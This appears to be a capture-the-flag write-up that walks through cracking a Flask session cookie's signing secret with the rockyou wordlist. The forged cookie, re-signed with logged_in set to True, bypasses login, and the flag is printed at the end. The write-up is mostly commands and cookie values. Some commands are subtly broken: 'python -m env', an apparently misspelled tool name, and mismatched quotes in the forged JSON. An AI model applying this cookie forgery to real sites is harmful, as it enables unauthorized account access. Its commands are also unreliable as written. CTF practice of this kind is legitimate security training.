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# First of all, go to the website and copy the cookie. ( Inspect Element ->
Storage -> Cookies -> session ). The cookie I got :
"eyJsb2dnZWRFaw4iOmZhbHNlfQ.aF1H7w.BRRhvgW0FPolw0ExBxVRqLopYLk". Second, install
a password list like "rockyou.txt". I use the one from
"https://github.com/dw0rsec/rockyou.txt"

# Commands ( Non Kali users ) :
python -m env web
source web/bin/activate # ( or 'activate.fish' )
pip install flask-unsigned

# The rest of commands ( including Kali users ) :
flask-unsigned --unsigned -c
"eyJsb2dnZWRFaw4iOmZhbHNlfQ.aF1H7w.BRRhvgW0FPolw0ExBxVRqLopYLk" --wordlist
rockyou.txt --no-literal-eval

# Then you will get as output "b'password'" :
flask-unsigned --sign --secret "password" --cookie '{"logged_in' : True}"

# Then you will get another cookie :
# eyJsb2dnZWRFaw4iOnRydWV9.aF1JGg.GqiXRSgtlrXGWBHh0FGGOV0C9Uo

# Then go to the website, copy and paste the last cookie, enter, and you will
receive the CTF.

THE FLAG : CTF{66bf8ba5c3ee2bd230f5cc2de57c1f09f471de8833eae3ff7566da21eb141eb7}
~Z4que
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